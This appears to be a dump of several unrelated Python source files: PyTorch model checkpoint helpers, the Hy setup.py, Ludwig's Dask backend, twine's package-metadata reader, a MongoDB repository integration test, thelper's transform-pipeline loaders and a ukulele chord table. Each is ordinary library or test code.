fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class RedirectOut():
def __init__(self, out):
super().__init__()
self.out = out
self.original = sys.stdout
def __enter__(self):
self.__fd = open(self.out, 'w')
sys.stdout = self.__fd
def __exit__(self, type, value, traceback):
sys.stdout = self.original
self.__fd.close()
def instantiate_augmenters(augmentation_list):
augmentation_methods = []
for augmentation in augmentation_list:
method = list(augmentation)[0]
params = dict(augmentation[method])
if method == 'Sometimes':
params["then_list"] = instantiate_augmenters(params["then_list"])
for k, v in params.items():
if isinstance(v, (list, ListConfig)):
params[k] = tuple(v)
m = hydra.utils.get_method(
f"imgaug.augmenters.{method}")(**params)
augmentation_methods.append(m)
log.debug(
f"Register imgaug.augmenters.{method} as augmentation method")
return augmentation_methods
# https://discuss.pytorch.org/t/access-att-of-model-wrapped-within-torch-nn-dataparallel-maximum-recursion-depth-exceeded/46975/2
class CustomDataParallel(torch.nn.DataParallel):
def __getattr__(self, name):
try:
return super().__getattr__(name)
except AttributeError:
return getattr(self.module, name)
def load_model(model, optimizer, scheduler, path, resume=False):
path = Path(path)
if not path.exists():
log.warning(f"Model path {path} does not exists!")
return 1
checkpoint = torch.load(path)
epoch = checkpoint["epoch"] if resume else 0
state_dict_ = checkpoint['state_dict']
state_dict = {}
# convert data_parallel state dict keys back to plain model keys
for k in state_dict_:
if k.startswith('module') and not k.startswith('module_list'):
state_dict[k[7:]] = state_dict_[k]
else:
state_dict[k] = state_dict_[k]
model_state_dict = model.state_dict()
for k in state_dict:
if k in model_state_dict:
if state_dict[k].shape != model_state_dict[k].shape:
log.warning(
f"skip parameter {k} because of shape mismatch")
state_dict[k] = model_state_dict[k]
else:
log.info(f"drop parameter {k}")
for k in model_state_dict:
if k not in state_dict:
log.warning(f"no parameter {k} available")
state_dict[k] = model_state_dict[k]
model.load_state_dict(state_dict, strict=False)
log.info(f"restore pretrained weights")
if resume and 'optimizer' in checkpoint and optimizer is not None:
log.info(f"restore optimizer state at epoch {epoch}")
optimizer.load_state_dict(checkpoint['optimizer'])
if 'scheduler' in checkpoint and scheduler is not None:
log.info("restore scheduler state")
scheduler.load_state_dict(checkpoint['scheduler'])
return (epoch + 1) if resume else epoch
def save_model(model, path, epoch, optimizer=None, scheduler=None):
if isinstance(model, torch.nn.DataParallel):
state_dict = model.module.state_dict()
else:
state_dict = model.state_dict()
data = {
'epoch': epoch,
'state_dict': state_dict
}
if optimizer is not None:
data["optimizer"] = optimizer.state_dict()
if scheduler is not None:
data["scheduler"] = scheduler.state_dict()
torch.save(data, path) | 0.612078 | 0.167151 |
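The `module.` prefix handling in `load_model` above can be illustrated with a plain dictionary, so the snippet runs without torch installed; the key names are invented.

state_dict_ = {"module.conv.weight": 1, "module_list.0.bias": 2, "fc.weight": 3}
state_dict = {}
for k, v in state_dict_.items():
    if k.startswith("module") and not k.startswith("module_list"):
        state_dict[k[7:]] = v  # strip the "module." prefix added by DataParallel
    else:
        state_dict[k] = v
print(state_dict)  # {'conv.weight': 1, 'module_list.0.bias': 2, 'fc.weight': 3}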
import os
import re
import sys
from setuptools import find_packages, setup
PKG = "hy"
VERSIONFILE = os.path.join(PKG, "version.py")
verstr = "unknown"
try:
verstrline = open(VERSIONFILE, "rt").read()
except EnvironmentError:
pass # Okay, there is no version file.
else:
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(VSRE, verstrline, re.M)
if mo:
__version__ = mo.group(1)
else:
msg = "if %s.py exists, it is required to be well-formed" % VERSIONFILE
raise RuntimeError(msg)
long_description = """Hy is a Python <--> Lisp layer. It helps
make things work nicer, and lets Python and the Hy lisp variant play
nice together. """
install_requires = ['rply>=0.7.0', 'astor>=0.5', 'clint>=0.4']
if sys.version_info[:2] < (2, 7):
install_requires.append('argparse>=1.2.1')
install_requires.append('importlib>=1.0.2')
if os.name == 'nt':
install_requires.append('pyreadline>=2.1')
setup(
name=PKG,
version=__version__,
install_requires=install_requires,
entry_points={
'console_scripts': [
'hy = hy.cmdline:hy_main',
'hyc = hy.cmdline:hyc_main',
'hy2py = hy.cmdline:hy2py_main',
]
},
packages=find_packages(exclude=['tests*']),
package_data={
'hy.contrib': ['*.hy'],
'hy.core': ['*.hy'],
},
author="<NAME>",
author_email="<EMAIL>",
long_description=long_description,
description='Lisp and Python love each other.',
license="Expat",
url="http://hylang.org/",
platforms=['any'],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: DFSG approved",
"License :: OSI Approved :: MIT License", # Really "Expat". Ugh.
"Operating System :: OS Independent",
"Programming Language :: Lisp",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Topic :: Software Development :: Code Generators",
"Topic :: Software Development :: Compilers",
"Topic :: Software Development :: Libraries",
]
) | setup.py |
import os
import re
import sys
from setuptools import find_packages, setup
PKG = "hy"
VERSIONFILE = os.path.join(PKG, "version.py")
verstr = "unknown"
try:
verstrline = open(VERSIONFILE, "rt").read()
except EnvironmentError:
pass # Okay, there is no version file.
else:
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(VSRE, verstrline, re.M)
if mo:
__version__ = mo.group(1)
else:
msg = "if %s.py exists, it is required to be well-formed" % VERSIONFILE
raise RuntimeError(msg)
long_description = """Hy is a Python <--> Lisp layer. It helps
make things work nicer, and lets Python and the Hy lisp variant play
nice together. """
install_requires = ['rply>=0.7.0', 'astor>=0.5', 'clint>=0.4']
if sys.version_info[:2] < (2, 7):
install_requires.append('argparse>=1.2.1')
install_requires.append('importlib>=1.0.2')
if os.name == 'nt':
install_requires.append('pyreadline>=2.1')
setup(
name=PKG,
version=__version__,
install_requires=install_requires,
entry_points={
'console_scripts': [
'hy = hy.cmdline:hy_main',
'hyc = hy.cmdline:hyc_main',
'hy2py = hy.cmdline:hy2py_main',
]
},
packages=find_packages(exclude=['tests*']),
package_data={
'hy.contrib': ['*.hy'],
'hy.core': ['*.hy'],
},
author="<NAME>",
author_email="<EMAIL>",
long_description=long_description,
description='Lisp and Python love each other.',
license="Expat",
url="http://hylang.org/",
platforms=['any'],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: DFSG approved",
"License :: OSI Approved :: MIT License", # Really "Expat". Ugh.
"Operating System :: OS Independent",
"Programming Language :: Lisp",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Topic :: Software Development :: Code Generators",
"Topic :: Software Development :: Compilers",
"Topic :: Software Development :: Libraries",
]
) | 0.232833 | 0.116011 |
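The version-extraction regex in the setup script above can be checked in isolation with only the standard library; the sample string is made up.

import re

VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
sample = '__author__ = "someone"\n__version__ = "0.12.1"\n'
mo = re.search(VSRE, sample, re.M)
print(mo.group(1) if mo else "unknown")  # 0.12.1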
from ludwig.backend.base import Backend, LocalTrainingMixin
from ludwig.constants import NAME, PARQUET, PREPROCESSING
from ludwig.data.dataframe.dask import DaskEngine
from ludwig.data.dataset.partitioned import PartitionedDataset
from ludwig.models.predictor import BasePredictor, Predictor, get_output_columns
class DaskRemoteModel:
def __init__(self, model):
self.cls, self.args, state = list(model.__reduce__())
self.state = state
def load(self):
obj = self.cls(*self.args)
# TODO(travis): get_connected_model is needed here because TF will not init
# all weights until the graph has been traversed
obj.get_connected_model()
obj.__setstate__(self.state)
return obj
class DaskPredictor(BasePredictor):
def __init__(self, predictor_kwargs):
self.predictor_kwargs = predictor_kwargs
def batch_predict(self, model, dataset, *args, **kwargs):
self._check_dataset(dataset)
remote_model = DaskRemoteModel(model)
predictor_kwargs = self.predictor_kwargs
output_columns = get_output_columns(model.output_features)
def batch_predict_partition(dataset):
model = remote_model.load()
predictor = Predictor(**predictor_kwargs)
predictions = predictor.batch_predict(model, dataset, *args, **kwargs)
ordered_predictions = predictions[output_columns]
return ordered_predictions
return dataset.map_dataset_partitions(
batch_predict_partition,
meta=[(c, 'object') for c in output_columns]
)
def batch_evaluation(self, model, dataset, collect_predictions=False, **kwargs):
raise NotImplementedError(
'Dask backend does not support batch evaluation at this time.'
)
def batch_collect_activations(self, model, *args, **kwargs):
raise NotImplementedError(
'Dask backend does not support collecting activations at this time.'
)
def _check_dataset(self, dataset):
if not isinstance(dataset, PartitionedDataset):
raise RuntimeError(
f'Dask backend requires PartitionedDataset for inference, '
f'found: {type(dataset)}'
)
def shutdown(self):
pass
class DaskBackend(LocalTrainingMixin, Backend):
def __init__(self, data_format=PARQUET, **kwargs):
super().__init__(data_format=data_format, **kwargs)
self._df_engine = DaskEngine()
if data_format != PARQUET:
raise ValueError(
f'Data format {data_format} is not supported when using the Dask backend. '
f'Try setting to `parquet`.'
)
def initialize(self):
pass
def create_predictor(self, **kwargs):
return DaskPredictor(kwargs)
@property
def df_engine(self):
return self._df_engine
@property
def supports_multiprocessing(self):
return False
def check_lazy_load_supported(self, feature):
if not feature[PREPROCESSING]['in_memory']:
raise ValueError(
f'DaskBackend does not support lazy loading of data files at train time. '
f'Set preprocessing config `in_memory: True` for feature {feature[NAME]}') | ludwig/backend/dask.py |
from ludwig.backend.base import Backend, LocalTrainingMixin
from ludwig.constants import NAME, PARQUET, PREPROCESSING
from ludwig.data.dataframe.dask import DaskEngine
from ludwig.data.dataset.partitioned import PartitionedDataset
from ludwig.models.predictor import BasePredictor, Predictor, get_output_columns
class DaskRemoteModel:
def __init__(self, model):
self.cls, self.args, state = list(model.__reduce__())
self.state = state
def load(self):
obj = self.cls(*self.args)
# TODO(travis): get_connected_model is needed here because TF will not init
# all weights until the graph has been traversed
obj.get_connected_model()
obj.__setstate__(self.state)
return obj
class DaskPredictor(BasePredictor):
def __init__(self, predictor_kwargs):
self.predictor_kwargs = predictor_kwargs
def batch_predict(self, model, dataset, *args, **kwargs):
self._check_dataset(dataset)
remote_model = DaskRemoteModel(model)
predictor_kwargs = self.predictor_kwargs
output_columns = get_output_columns(model.output_features)
def batch_predict_partition(dataset):
model = remote_model.load()
predictor = Predictor(**predictor_kwargs)
predictions = predictor.batch_predict(model, dataset, *args, **kwargs)
ordered_predictions = predictions[output_columns]
return ordered_predictions
return dataset.map_dataset_partitions(
batch_predict_partition,
meta=[(c, 'object') for c in output_columns]
)
def batch_evaluation(self, model, dataset, collect_predictions=False, **kwargs):
raise NotImplementedError(
'Dask backend does not support batch evaluation at this time.'
)
def batch_collect_activations(self, model, *args, **kwargs):
raise NotImplementedError(
'Dask backend does not support collecting activations at this time.'
)
def _check_dataset(self, dataset):
if not isinstance(dataset, PartitionedDataset):
raise RuntimeError(
f'Dask backend requires PartitionedDataset for inference, '
f'found: {type(dataset)}'
)
def shutdown(self):
pass
class DaskBackend(LocalTrainingMixin, Backend):
def __init__(self, data_format=PARQUET, **kwargs):
super().__init__(data_format=data_format, **kwargs)
self._df_engine = DaskEngine()
if data_format != PARQUET:
raise ValueError(
f'Data format {data_format} is not supported when using the Dask backend. '
f'Try setting to `parquet`.'
)
def initialize(self):
pass
def create_predictor(self, **kwargs):
return DaskPredictor(kwargs)
@property
def df_engine(self):
return self._df_engine
@property
def supports_multiprocessing(self):
return False
def check_lazy_load_supported(self, feature):
if not feature[PREPROCESSING]['in_memory']:
raise ValueError(
f'DaskBackend does not support lazy loading of data files at train time. '
f'Set preprocessing config `in_memory: True` for feature {feature[NAME]}') | 0.636127 | 0.203787 |
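`DaskRemoteModel` above relies on the `__reduce__`/`__setstate__` protocol to ship a model to workers and rebuild it there; a toy class (not a Ludwig model) is enough to sketch the round trip.

class ToyModel:
    def __init__(self, n_inputs):
        self.n_inputs = n_inputs
        self.weights = None

    def __reduce__(self):
        return (ToyModel, (self.n_inputs,), {"weights": self.weights})

    def __setstate__(self, state):
        self.__dict__.update(state)

model = ToyModel(4)
model.weights = [0.1, 0.2, 0.3, 0.4]
cls, args, state = list(model.__reduce__())
clone = cls(*args)         # rebuild the object shell on the worker...
clone.__setstate__(state)  # ...then restore its state
print(clone.n_inputs, clone.weights)  # 4 [0.1, 0.2, 0.3, 0.4]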
import glob
import os
import sys
import warnings
from typing import Optional
import pkginfo
class Installed(pkginfo.Installed):
def read(self) -> Optional[str]:
opj = os.path.join
if self.package is not None:
package = self.package.__package__
if package is None:
package = self.package.__name__
egg_pattern = "%s*.egg-info" % package
dist_pattern = "%s*.dist-info" % package
file: Optional[str] = getattr(self.package, "__file__", None)
if file is not None:
candidates = []
def _add_candidate(where: str) -> None:
candidates.extend(glob.glob(where))
for entry in sys.path:
if file.startswith(entry):
_add_candidate(opj(entry, "METADATA")) # egg?
_add_candidate(opj(entry, "EGG-INFO")) # egg?
# dist-installed?
_add_candidate(opj(entry, egg_pattern))
_add_candidate(opj(entry, dist_pattern))
dir, name = os.path.split(self.package.__file__)
_add_candidate(opj(dir, egg_pattern))
_add_candidate(opj(dir, dist_pattern))
_add_candidate(opj(dir, "..", egg_pattern))
_add_candidate(opj(dir, "..", dist_pattern))
for candidate in candidates:
if os.path.isdir(candidate):
path = opj(candidate, "PKG-INFO")
if not os.path.exists(path):
path = opj(candidate, "METADATA")
else:
path = candidate
if os.path.exists(path):
with open(path) as f:
return f.read()
warnings.warn(
"No PKG-INFO or METADATA found for package: %s" % self.package_name
)
return None | venv/Lib/site-packages/twine/_installed.py | import glob
import os
import sys
import warnings
from typing import Optional
import pkginfo
class Installed(pkginfo.Installed):
def read(self) -> Optional[str]:
opj = os.path.join
if self.package is not None:
package = self.package.__package__
if package is None:
package = self.package.__name__
egg_pattern = "%s*.egg-info" % package
dist_pattern = "%s*.dist-info" % package
file: Optional[str] = getattr(self.package, "__file__", None)
if file is not None:
candidates = []
def _add_candidate(where: str) -> None:
candidates.extend(glob.glob(where))
for entry in sys.path:
if file.startswith(entry):
_add_candidate(opj(entry, "METADATA")) # egg?
_add_candidate(opj(entry, "EGG-INFO")) # egg?
# dist-installed?
_add_candidate(opj(entry, egg_pattern))
_add_candidate(opj(entry, dist_pattern))
dir, name = os.path.split(self.package.__file__)
_add_candidate(opj(dir, egg_pattern))
_add_candidate(opj(dir, dist_pattern))
_add_candidate(opj(dir, "..", egg_pattern))
_add_candidate(opj(dir, "..", dist_pattern))
for candidate in candidates:
if os.path.isdir(candidate):
path = opj(candidate, "PKG-INFO")
if not os.path.exists(path):
path = opj(candidate, "METADATA")
else:
path = candidate
if os.path.exists(path):
with open(path) as f:
return f.read()
warnings.warn(
"No PKG-INFO or METADATA found for package: %s" % self.package_name
)
return None | 0.372049 | 0.06148 |
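A toy end-to-end run of the glob-based metadata lookup above, against a temporary directory instead of a real site-packages entry; every name in it is made up.

import glob
import os
import tempfile

with tempfile.TemporaryDirectory() as entry:
    info_dir = os.path.join(entry, "examplepkg-1.0.dist-info")
    os.makedirs(info_dir)
    with open(os.path.join(info_dir, "METADATA"), "w") as f:
        f.write("Metadata-Version: 2.1\nName: examplepkg\nVersion: 1.0\n")
    for candidate in glob.glob(os.path.join(entry, "examplepkg*.dist-info")):
        path = os.path.join(candidate, "METADATA")
        if os.path.exists(path):
            with open(path) as f:
                print(f.read().splitlines()[-1])  # Version: 1.0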
from bson import ObjectId
from app.api.data.command.UserMongoCommandRepository import UserMongoCommandRepository
from app.api.domain.models.User import User
from app.api.domain.services.data.command.errors.CommandError import CommandError
from tests.integration.PdbMongoIntegrationTestBase import PdbMongoIntegrationTestBase
class UserMongoCommandRepositoryIntegrationTest(PdbMongoIntegrationTestBase):
def setUp(self):
self.fixtures = []
super(UserMongoCommandRepositoryIntegrationTest, self).setUp()
self.sut = UserMongoCommandRepository()
def tearDown(self):
self.db.users.delete_many({})
def test_updateUserAuthToken_calledWithValidAuthToken_authTokenCorrectlyUpdated(self):
test_id = ObjectId("5aae93045b488007cb4af590")
self.db.users.insert_one(
{"email": "<EMAIL>", "password": "<PASSWORD>", "nickname": "jimmy", "role": "student",
"_id": test_id})
self.sut.update_user_auth_token(test_id, "testauthtoken")
actual = User.from_json(self.db.users.find_one({"_id": test_id})).get_authtoken()
expected = "testauthtoken"
self.assertEqual(actual, expected)
def test_createUser_calledWithValidUser_userCorrectlyInserted(self):
test_user = self.__get_user_test_instance()
self.sut.create_user(test_user)
self.assertEqual(test_user.to_json_dict(), self.db.users.find_one({"email": "<EMAIL>"}))
def test_createUser_calledWithExistentUser_throwCommandError(self):
user = self.__get_user_test_instance()
self.sut.create_user(user)
self.assertRaises(CommandError, self.sut.create_user, user)
def test_incrementUserScore_calledWithExistentUserId_userScoreCorrectlyIncremented(self):
test_id = ObjectId("5aae93045b488007cb4af590")
self.db.users.insert_one(
{"email": "<EMAIL>", "password": "<PASSWORD>", "nickname": "jimmy", "role": "student",
"_id": test_id, "score": 400})
self.sut.increment_user_score(test_id, 30)
expected = 430
actual = User.from_json(self.db.users.find_one({"_id": test_id})).get_score()
self.assertEqual(actual, expected)
def __get_user_test_instance(self):
return User(_id=ObjectId("666f6f2d6261722d71757578"), email="<EMAIL>", password="<PASSWORD>",
role="master", nickname="testnickname") | app/tests/integration/UserMongoCommandRepositoryIntegrationTest.py | from bson import ObjectId
from app.api.data.command.UserMongoCommandRepository import UserMongoCommandRepository
from app.api.domain.models.User import User
from app.api.domain.services.data.command.errors.CommandError import CommandError
from tests.integration.PdbMongoIntegrationTestBase import PdbMongoIntegrationTestBase
class UserMongoCommandRepositoryIntegrationTest(PdbMongoIntegrationTestBase):
def setUp(self):
self.fixtures = []
super(UserMongoCommandRepositoryIntegrationTest, self).setUp()
self.sut = UserMongoCommandRepository()
def tearDown(self):
self.db.users.delete_many({})
def test_updateUserAuthToken_calledWithValidAuthToken_authTokenCorrectlyUpdated(self):
test_id = ObjectId("5aae93045b488007cb4af590")
self.db.users.insert_one(
{"email": "<EMAIL>", "password": "<PASSWORD>", "nickname": "jimmy", "role": "student",
"_id": test_id})
self.sut.update_user_auth_token(test_id, "testauthtoken")
actual = User.from_json(self.db.users.find_one({"_id": test_id})).get_authtoken()
expected = "testauthtoken"
self.assertEqual(actual, expected)
def test_createUser_calledWithValidUser_userCorrectlyInserted(self):
test_user = self.__get_user_test_instance()
self.sut.create_user(test_user)
self.assertEqual(test_user.to_json_dict(), self.db.users.find_one({"email": "<EMAIL>"}))
def test_createUser_calledWithExistentUser_throwCommandError(self):
user = self.__get_user_test_instance()
self.sut.create_user(user)
self.assertRaises(CommandError, self.sut.create_user, user)
def test_incrementUserScore_calledWithExistentUserId_userScoreCorrectlyIncremented(self):
test_id = ObjectId("5aae93045b488007cb4af590")
self.db.users.insert_one(
{"email": "<EMAIL>", "password": "<PASSWORD>", "nickname": "jimmy", "role": "student",
"_id": test_id, "score": 400})
self.sut.increment_user_score(test_id, 30)
expected = 430
actual = User.from_json(self.db.users.find_one({"_id": test_id})).get_score()
self.assertEqual(actual, expected)
def __get_user_test_instance(self):
return User(_id=ObjectId("666f6f2d6261722d71757578"), email="<EMAIL>", password="<PASSWORD>",
role="master", nickname="testnickname") | 0.384912 | 0.149345 |
import logging
import torchvision.transforms
import torchvision.utils
import thelper.utils
logger = logging.getLogger(__name__)
def load_transforms(stages, avoid_transform_wrapper=False):
"""Loads a transformation pipeline from a list of stages.
Each entry in the provided list will be considered a stage in the pipeline. The ordering of the stages
is important, as some transformations might not be compatible if taken out of order. The entries must
each be dictionaries that define an operation, its parameters, and some meta-parameters (detailed below).
The ``operation`` field of each stage will be used to dynamically import a specific type of operation to
apply. The ``params`` field of each stage will then be used to pass parameters to the constructor of
this operation.
If an operation is identified as ``"Augmentor.Pipeline"`` or ``"albumentations.Compose"``, it will be
specially handled. In both cases, the ``params`` field becomes mandatory in the stage dictionary, and it
must specify the Augmentor or albumentations pipeline operation names and parameters (as a dictionary).
Two additional optional config fields can then be set for Augmentor pipelines: ``input_tensor`` (bool)
which specifies whether the previous stage provides a ``torch.Tensor`` to the pipeline (default=False);
and ``output_tensor`` (bool) which specifies whether the output of the pipeline should be converted into
a tensor (default=False). For albumentations pipelines, two additional fields are also available, namely
``bbox_params`` (dict) and ``keypoint_params`` (dict). For more information on these, refer to the
documentation of ``albumentations.core.composition.Compose``. Finally, when unpacking dictionaries for
albumentations pipelines, the keys associated with bounding boxes/masks/keypoints that must be forwarded
to the composer can be specified via the ``bboxes_key``, ``mask_key``, and ``keypoints_key`` fields.
All operations can also specify which sample components they should be applied to via the ``target_key``
field. This field can contain a single key (typically a string), or a list of keys. The operation will
be applied at runtime to all values which are found in the samples with one of those keys. If no key is
provided for an operation, it will be applied to all array-like components of the sample. Finally, all
operations can specify a ``linked_fate`` field (bool) to specify whether the samples provided in lists
should all have the same fate or not (default=True).
Usage examples inside a session configuration file::
# ...
# the 'loaders' field may contain several transformation pipelines
# (see 'thelper.data.utils.create_loaders' for more information on these pipelines)
"loaders": {
# ...
# the 'base_transforms' operations are applied to all loaded samples
"base_transforms": [
{
"operation": "...",
"params": {
...
},
"target_key": [ ... ],
"linked_fate": ...
},
{
"operation": "...",
"params": {
...
},
"target_key": [ ... ],
"linked_fate": ...
},
...
],
# ...
Args:
stages: a list defining a series of transformations to apply as a single pipeline.
Returns:
A transformation pipeline object compatible with the ``torchvision.transforms`` interface.
.. seealso::
| :class:`thelper.transforms.wrappers.AlbumentationsWrapper`
| :class:`thelper.transforms.wrappers.AugmentorWrapper`
| :class:`thelper.transforms.wrappers.TransformWrapper`
| :func:`thelper.transforms.utils.load_augments`
| :func:`thelper.data.utils.create_loaders`
"""
assert isinstance(stages, list), "expected stages to be provided as a list"
if not stages:
return None, True # no-op transform, and dont-care append
assert all([isinstance(stage, dict) for stage in stages]), "expected all stages to be provided as dictionaries"
operations = []
for stage_idx, stage in enumerate(stages):
assert "operation" in stage and stage["operation"], f"stage #{stage_idx} is missing its operation field"
operation_name = stage["operation"]
operation_params = thelper.utils.get_key_def(["params", "parameters"], stage, {})
assert isinstance(operation_params, dict), f"stage #{stage_idx} parameters are not provided as a dictionary"
operation_targets = None
if "target_key" in stage:
assert isinstance(stage["target_key"], (list, str, int)), \
f"stage #{stage_idx} target keys are not provided as a list or string/int"
operation_targets = stage["target_key"] if isinstance(stage["target_key"], list) else [stage["target_key"]]
linked_fate = thelper.utils.str2bool(stage["linked_fate"]) if "linked_fate" in stage else True
if operation_name == "Augmentor.Pipeline":
import Augmentor
pipeline = Augmentor.Pipeline()
assert isinstance(operation_params, dict) and operation_params, \
"augmentor pipeline 'params' field should contain dictionary of suboperations"
for pipeline_op_name, pipeline_op_params in operation_params.items():
getattr(pipeline, pipeline_op_name)(**pipeline_op_params)
if "input_tensor" in stage and thelper.utils.str2bool(stage["input_tensor"]):
operations.append(torchvision.transforms.ToPILImage())
operations.append(thelper.transforms.wrappers.AugmentorWrapper(pipeline, operation_targets, linked_fate))
if "output_tensor" in stage and thelper.utils.str2bool(stage["output_tensor"]):
operations.append(torchvision.transforms.ToTensor())
elif operation_name == "albumentations.Compose":
assert isinstance(operation_params, dict) and operation_params, \
"albumentations pipeline 'params' field should contain dictionary of suboperations"
suboperations = []
for op_name, op_params in operation_params.items():
if not op_name.startswith("albumentations."):
op_name = "albumentations." + op_name
op_type = thelper.utils.import_class(op_name)
suboperations.append(op_type(**op_params))
probability = thelper.utils.get_key_def("probability", stage, 1.0)
to_tensor = thelper.utils.get_key_def("to_tensor", stage, None)
bbox_params = thelper.utils.get_key_def("bbox_params", stage, {})
add_targets = thelper.utils.get_key_def("add_targets", stage, {})
bboxes_key = thelper.utils.get_key_def("bboxes_key", stage, "bbox")
mask_key = thelper.utils.get_key_def("mask_key", stage, "mask")
keypoints_key = thelper.utils.get_key_def("keypoints_key", stage, "keypoints")
cvt_kpts_to_bboxes = thelper.utils.str2bool(thelper.utils.get_key_def("cvt_kpts_to_bboxes", stage, False))
operations.append(thelper.transforms.wrappers.AlbumentationsWrapper(
transforms=suboperations, to_tensor=to_tensor, bbox_params=bbox_params, add_targets=add_targets,
image_key=operation_targets, bboxes_key=bboxes_key, mask_key=mask_key, keypoints_key=keypoints_key,
probability=probability, cvt_kpts_to_bboxes=cvt_kpts_to_bboxes, linked_fate=linked_fate))
else:
operation_type = thelper.utils.import_class(operation_name)
try:
operation = operation_type(**operation_params)
except Exception:
logger.error(f"failed to create transform op {operation_name} with params:\n\t{str(operation_params)}")
raise
if not avoid_transform_wrapper and not isinstance(operation, (thelper.transforms.wrappers.TransformWrapper,
thelper.transforms.operations.NoTransform,
torchvision.transforms.Compose)):
operations.append(thelper.transforms.wrappers.TransformWrapper(operation,
target_keys=operation_targets,
linked_fate=linked_fate))
else:
operations.append(operation)
if len(operations) > 1:
return thelper.transforms.Compose(operations)
elif len(operations) == 1:
return operations[0]
else:
return None
def load_augments(config):
"""Loads a data augmentation pipeline.
An augmentation pipeline is essentially a specialized transformation pipeline that can be appended or
prefixed to the base transforms defined for all samples. Augmentations are typically used to diversify
the samples within the training set in order to help model generalization. They can also be applied to
validation and test samples in order to get multiple responses for the same input so that they can
be averaged/concatenated into a single output.
Usage examples inside a session configuration file::
# ...
# the 'loaders' field can contain several augmentation pipelines
# (see 'thelper.data.utils.create_loaders' for more information on these pipelines)
"loaders": {
# ...
# the 'train_augments' operations are applied to training samples only
"train_augments": {
# specifies whether to apply the augmentations before or after the base transforms
"append": false,
"transforms": [
{
# here, we use a single stage, which is actually an augmentor sub-pipeline
# that is purely probabilistic (i.e. it does not increase input sample count)
"operation": "Augmentor.Pipeline",
"params": {
# the augmentor pipeline defines two operations: rotations and flips
"rotate_random_90": {"probability": 0.75},
"flip_random": {"probability": 0.75}
}
}
]
},
# ...
}
# ...
Args:
config: the configuration dictionary defining the meta parameters as well as the list of transformation
operations of the augmentation pipeline.
Returns:
A tuple that consists of a pipeline compatible with the ``torchvision.transforms`` interfaces, and
a bool specifying whether this pipeline should be appended or prefixed to the base transforms.
.. seealso::
| :class:`thelper.transforms.wrappers.AugmentorWrapper`
| :func:`thelper.transforms.utils.load_transforms`
| :func:`thelper.data.utils.create_loaders`
"""
assert isinstance(config, dict), "augmentation config should be provided as dictionary"
augments = None
augments_append = False
if "append" in config:
augments_append = thelper.utils.str2bool(config["append"])
if "transforms" in config and config["transforms"]:
augments = thelper.transforms.load_transforms(config["transforms"])
    return augments, augments_append | thelper/transforms/utils.py | 0.86674 | 0.697107 |
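# --- Illustrative usage sketch (added note, not part of the thelper source above) ---
# A minimal example of passing the 'train_augments' configuration documented in the
# load_augments() docstring into the function. It assumes thelper (and Augmentor) are
# installed; the operation names and probabilities simply mirror the docstring example.
from thelper.transforms.utils import load_augments

train_augments_config = {
    "append": False,
    "transforms": [{
        "operation": "Augmentor.Pipeline",
        "params": {
            "rotate_random_90": {"probability": 0.75},
            "flip_random": {"probability": 0.75},
        },
    }],
}
augments, append = load_augments(train_augments_config)
# 'augments' is a torchvision-compatible pipeline (or None if no transforms were given);
# 'append' tells the data loader whether to apply it after (True) or before (False) the
# base transforms.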
__all__ = [
'CHORDS', 'CHORD_TABS',
'UkuleleNoteError', 'UkuleleChordError',
'get_chord', 'get_note'
]
class UkuleleNoteError(Exception) :
pass
class UkuleleChordError(Exception) :
pass
def get_note(string, fret) :
if abs(string) < len(FRETS) :
if abs(fret) < len(FRETS[string]) :
return FRETS[string][fret]
raise UkuleleNoteError(string, fret)
def get_chord(chord) :
if chord in CHORD_TABS :
return tuple([
get_note(string, fret) for string, fret in enumerate(CHORD_TABS[chord])
])
raise UkuleleChordError(chord)
FRETS = (
('G4', 'G#4', 'A4', 'A#4', 'B4', 'C5', 'C#5', 'D5', 'D#5', 'E5', 'F5', 'F#5', 'G5'),
('C4', 'C#4', 'D4', 'D#4', 'E4', 'F4', 'F#4', 'G4', 'G#4', 'A4', 'A#4', 'B4', 'C5'),
('E4', 'F4', 'F#4', 'G4', 'G#4', 'A4', 'A#4', 'B4', 'C5', 'C#5', 'D5', 'D#5', 'E5'),
('A4', 'A#4', 'B4', 'C5', 'C#5', 'D5', 'D#5', 'E5', 'F5', 'F#5', 'G5', 'G#5', 'A5'),
)
CHORD_TABS = {
'C' : (0, 0, 0, 3),
'C7' : (0, 0, 0, 1),
'Cm' : (0, 3, 3, 3),
'Cm7' : (3, 3, 3, 3),
'Cdim' : (2, 3, 2, 3),
'Caug' : (1, 0, 0, 3),
'C6' : (0, 0, 0, 0),
'Cmaj7' : (0, 0, 0, 2),
'C9' : (0, 2, 0, 1),
'C#' : (1, 1, 1, 4),
'C#7' : (1, 1, 1, 2),
'C#m' : (1, 1, 0, 3),
'C#m7' : (4, 4, 4, 4),
'C#dim' : (0, 1, 0, 1),
'C#aug' : (2, 1, 1, 0),
'C#6' : (1, 1, 1, 1),
'C#maj7' : (1, 1, 1, 3),
'C#9' : (1, 3, 1, 2),
'D' : (2, 2, 2, 0),
'D7' : (2, 2, 2, 3),
'Dm' : (2, 2, 1, 0),
'Dm7' : (2, 2, 1, 3),
'Ddim' : (1, 2, 1, 2),
'Daug' : (3, 2, 2, 1),
'D6' : (2, 2, 2, 2),
'Dmaj7' : (2, 2, 2, 4),
'D9' : (2, 4, 2, 3),
'Eb' : (1, 3, 3, 3),
'Eb7' : (3, 3, 3, 4),
'Ebm' : (3, 3, 2, 1),
'Ebm7' : (3, 3, 2, 4),
'Ebdim' : (2, 3, 2, 3),
'Ebaug' : (2, 1, 1, 4),
'Eb6' : (3, 3, 3, 3),
'Ebmaj7' : (3, 3, 3, 0),
'Eb9' : (0, 1, 1, 1),
